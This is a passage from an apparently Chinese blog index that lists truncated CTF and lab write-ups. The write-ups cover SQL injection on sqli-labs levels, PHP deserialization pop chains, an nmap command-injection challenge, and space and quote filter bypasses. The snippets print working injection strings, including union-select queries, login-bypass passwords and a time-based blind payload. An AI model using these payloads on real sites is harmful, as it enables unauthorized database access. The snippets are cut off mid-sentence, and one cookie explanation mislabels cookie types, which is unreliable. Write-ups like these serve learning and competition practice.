weixin_43952190的博客

CTF

POST注入less11post类型一个登陆框试一下万能密码：uname=admin’ or ‘1’='1–+&passwd=1显示出Your Login name:adminYour Password:admin所以猜测sql语句是：$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";注入如下(同对id的注入方法)：u..

GET注入less1：?id=1’ #报错?id=1’ and 1=1–+ #正常 ?id=1’ and 1=2–+ #语句正常但返回异常?id=1’ order by 3–+ #正常?id=-1’ union select 1,2,3–+ #2为显示位?id=-1’ union select 1,group_concat(schema_name),3, from information_schema.schemata–+?id=-1’

GKCTF_20200x01 签到0x02 问卷调查0x03 Pokémon0x04 code obfuscation0x01 签到比赛直播间地址：https://live.bilibili.com/772947屏幕上有flag；0x02 问卷调查填写对这次比赛的问卷调查，就可以得到flag。flag{I_W4nt_t0_Fu4k_GKCTF}0x03 Pokémon一个.gba格式的文件，下载Visual Boy Advance打开；是一个叫 口袋怪兽绿宝石的游戏。没办法，

2020网鼎杯青龙组0x01 misc_签到题0x02 WEB1_AreUSerialz0x03 WEB_filejava0x01 misc_签到题有必要说一下签到题，进去后是一个答题的模式，可能大家觉得答几道后还不出flag就会失望，或者转去其他地方找突破口。但是每次答完后它会给你一个称谓，可能你答对题数越高地位称呼会越高，最终能拿到flag吧。作对15道后会出现提交Token的提示框。提交本队的token后，可以F12得到flag。或者用bp抓包，当提交后才能抓到包。所以明显看到就是给/f

0x01 Esunserialize构造反序列化Pop链字符逃逸上源码：<?phpshow_source("index.php");function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);}function read($data) { return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);}

0x01 JustSosoparse_url的解析漏洞_wakeup()绕过序列化pop链的构造php引用赋值打开页面后查看源代码：提示为本地文件包含漏洞，查看index.php和hint.php.index.php:<?phperror_reporting(0); $file = $_GET["file"]; $payload = $_GET["payload"];if(!isset($file)){ echo 'Missing parameter'.'<

Ezpop序列化Pop链利用几个类之间相互关联进行构造文件包含漏洞Modifier类中append函数使用了include()，会出现文件包含漏洞。以下是题目内容：Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%

online_tool进去后得到以上页面，其中设置X-Forwarded-For或者不设置不影响题目，它只是设置命名，$sandbox为目录名。代码实现的功能就是在线进行namp扫描，通过get一个host主域名进行扫描。对上面出现的nmap命令进行了解：-T5 : 可以加快或者减慢扫描速度，有六个级别，级别越高速度越快，也越容易被WAF或者IDS发现。-sT：使用TCP Syn...

misc0x01 签到题5G都来了，6G还远吗？6G下还需要开会员才能高速下载吗？请提交 DASCTF{} 里的内容。下载发现有将近1G。作为签到题应该不需要这样做。按下F12，接收到payload。payload如下：REFTQ1RGe3dlbGNvbWVfdG9fREFTX0FwMXIxfc9Vo4jQqwH4ON+olEgxiijIjbgcdJur4VZjq9WlhUI...

easysql进入后这样的页面，正常用’会报错，然后用burp扫一下。尽然就出来了！原来要用万能密码就行了，现在总结一下 万能密码:aspaspx万能密码1："or “a”="a2：‘.).or.(’.a.’=’.a3：or 1=1–4：'or 1=1–5：a’or’ 1=1–6："or 1=1–7：'or.‘a.’...

浏览器所有的Cookie分为两种：一种是“Session Cookie”，又称“临时Cookie”；另一种是“Third-party-Cookie”，也称为“本地Cookie”；两者的区别在于“Third-party-Cookie”是服务器在set-Cookie时指定了EXpire时间，只有到了Expire时间后Cookie才会失效，所以这种Cookie会保存在本地；而Session Cooki...

绕过空格/**/ ,/!/ #注释符%20 %09 %0a %0b %0c %0d %a0 %00双空格，tab代替空格利用括号：select(user())from dual where(1=1)and(2=2)id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23引号绕过...